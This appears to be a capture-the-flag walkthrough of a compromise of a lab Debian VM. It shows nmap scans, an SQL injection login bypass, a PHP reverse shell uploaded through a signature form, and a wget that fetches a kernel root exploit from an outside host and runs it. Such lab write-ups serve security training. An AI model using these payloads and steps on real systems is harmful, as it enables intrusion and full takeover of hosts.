Looking for our target:
root@osboxes:~# nmap -sn 192.168.1.0/24OK, from scanning our subnet we know that our target has IP: 192.168.1.103
What kind of services are running on our target?
root@osboxes:~# nmap -sV -A 192.168.1.103Excellent, we have got a lof of interesting information. As always let's open the web application in browser.
Starting Nmap 6.47 ( http://nmap.org ) at 2016-02-01 15:32 GMT
Nmap scan report for 192.168.1.103
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 1024 8c:77:73:be:0d:a8:d5:7f:d8:b7:27:30:ed:52:85:23 (DSA)
|_ 2048 8b:df:2d:cd:cb:d1:5e:a8:8e:70:93:2d:a6:5f:f1:3c (RSA)
25/tcp open smtp Exim smtpd 4.50
| smtp-commands: localhost.localdomain Hello nmap.scanme.org [192.168.1.104], SIZE 52428800, PIPELINING, HELP,
|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA NOOP QUIT RSET HELP
80/tcp open http Apache httpd 2.2.9 ((Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch)
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-24+lenny4
| mysql-info:
| Protocol: 53
| Version: .0.51a-24+lenny4
| Thread ID: 33
| Capabilities flags: 41516
| Some Capabilities: Support41Auth, SupportsCompression, SupportsTransactions, LongColumnFlag, ConnectWithDatabase, Speaks41ProtocolNew
| Status: Autocommit
|_ Salt: PR//?/jL{G0XLS<sProU
7777/tcp open cbt?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port7777-TCP:V=6.47%I=7%D=2/1%Time=56AF7AA0%P=i686-pc-linux-gnu%r(NULL,
SF:D,"HELO\nCOMMAND:")%r(X11Probe,14,"HELO\nCOMMAND:RECV:\x20l")%r(Socks5,
SF:15,"HELO\nCOMMAND:RECV:\x20\x05\x04")%r(Arucer,3E,"HELO\nCOMMAND:RECV:\
SF:x20\xc2\xe5\xe5\xe5\x9e\xa0\xd7\xa4\xa6\xd0\xd5\xdd\xdc\xc8\xd6\xdd\xd7
SF:\xd5\xc8\xd1\xd6\x83\x80\xc8\xdd\xa4\xd1\xa1\xc8\xa4\xd2\xd5\xd7\xdd\xa
SF:3\xa4\xa1\xdd\xa6\xd7\xdd\x98\xe5")%r(GenericLines,17,"HELO\nCOMMAND:RE
SF:CV:\x20\r\n\r\n")%r(GetRequest,25,"HELO\nCOMMAND:RECV:\x20GET\x20/\x20H
SF:TTP/1\.0\r\n\r\n")%r(HTTPOptions,29,"HELO\nCOMMAND:RECV:\x20OPTIONS\x20
SF:/\x20HTTP/1\.0\r\n\r\n")%r(RTSPRequest,29,"HELO\nCOMMAND:RECV:\x20OPTIO
SF:NS\x20/\x20RTSP/1\.0\r\n\r\n")%r(RPCCheck,14,"HELO\nCOMMAND:RECV:\x20\x
SF:80")%r(DNSVersionBindReq,13,"HELO\nCOMMAND:RECV:\x20")%r(DNSStatusReque
SF:st,13,"HELO\nCOMMAND:RECV:\x20")%r(Help,19,"HELO\nCOMMAND:RECV:\x20HELP
SF:\r\n")%r(SSLSessionReq,15,"HELO\nCOMMAND:RECV:\x20\x16\x03")%r(Kerberos
SF:,13,"HELO\nCOMMAND:RECV:\x20")%r(SMBProgNeg,13,"HELO\nCOMMAND:RECV:\x20
SF:")%r(FourOhFourRequest,48,"HELO\nCOMMAND:RECV:\x20GET\x20/nice%20ports%
SF:2C/Tri%6Eity\.txt%2ebak\x20HTTP/1\.0\r\n\r\n")%r(LPDString,1C,"HELO\nCO
SF:MMAND:RECV:\x20\x01default\n")%r(LDAPBindReq,1E,"HELO\nCOMMAND:RECV:\x2
SF:00\x0c\x02\x01\x01`\x07\x02\x01\x02\x04")%r(SIPOptions,D,"HELO\nCOMMAND
SF::")%r(LANDesk-RC,18,"HELO\nCOMMAND:RECV:\x20TNMP\x04")%r(TerminalServer
SF:,14,"HELO\nCOMMAND:RECV:\x20\x03")%r(NCP,17,"HELO\nCOMMAND:RECV:\x20Dmd
SF:T")%r(NotesRPC,14,"HELO\nCOMMAND:RECV:\x20:")%r(WMSRequest,14,"HELO\nCO
SF:MMAND:RECV:\x20\x01")%r(oracle-tns,13,"HELO\nCOMMAND:RECV:\x20")%r(afp,
SF:13,"HELO\nCOMMAND:RECV:\x20")%r(kumo-server,14,"HELO\nCOMMAND:RECV:\x20
SF:\x94");
MAC Address: 00:0C:29:47:61:1C (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.5 - 2.6.12
Network Distance: 1 hop
Service Info: Host: localhost.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: DEBIAN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
Nothing special :-) But below all posts we have also link Post new entry! Hmmm, OK, before execution dirbuster, let's examine the link.
I examined this web based form in the following way:
Username: adminBut unfortunately my post was validated and part <?php was removed from contemt of my post. At least we know that Password field is vulnerable to SQL Injection.
Password: admin' OR 1=1 -- -
Title: test
Content: <?php echo "test"; ?>
OK, what else can we do? Hmmm, Change profile settings! looks very interesting :-)
Let's try the same technique... OK, I have got following response
Authenticated.Your signature has successfully been entered updated.Good, but I don't know where is stored the signature. Maybe burpsuite will be useful in our case. In the meantime we execute dirbuster.
We can see that our script is not validated via the web application (is only encoded) and we see that our script is inserted into sig.txt file
Dirbuster result:
repo directory may be helpful for us and profiles directory as well as admin.
OK, now I am looking for my sig.txt file...
Great! I have found our script in profiles directory!
So, now let's send again our web based form, but now we will edit our file name from sig.txt to shell.php and we will copy content of /usr/share/webshells/php/php-reverse-shell.php, edit $port and $ip and paste into our web form.
Excellent, now we have to find /profiles/admin-shell.php and execute.
Result:
We have lgot imited shell :-)
As always, let's execute command:
www-data@debian:/tmp$ uname -aGood, now we have to find appropriate exploit to escalate our privileges :-)
uname -a
Linux debian 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
Linux Kernel < 2.6.19 - udp_sendmsg Local Root Exploit (x86/x64)OK, let's play the ball!
www-data@debian:/tmp$ wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgzAnd BOOM!!
<ve-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
--10:00:17-- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9574.tgz
=> `9574.tgz'
Resolving github.com... 192.30.252.130
Connecting to github.com[192.30.252.130]:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz [following]
--10:00:18-- https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/9574.tgz
=> `9574.tgz'
Resolving raw.githubusercontent.com... 185.31.17.133
Connecting to raw.githubusercontent.com[185.31.17.133]:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,359 [application/octet-stream]
100%[====================================>] 4,359 --.--K/s
10:00:18 (94.48 MB/s) - `9574.tgz' saved [4359/4359]
www-data@debian:/tmp$ ls
ls
9574.tgz
www-data@debian:/tmp$ tar zxvf 9574.tgz
tar zxvf 9574.tgz
therebel/
therebel/exploit.c
therebel/pwnkernel.c
therebel/therebel.sh
www-data@debian:/tmp$ cd therebel
cd therebel
www-data@debian:/tmp/therebel$ ls
ls
exploit.c pwnkernel.c therebel.sh
www-data@debian:/tmp/therebel$ bash therebel.sh
Game Over!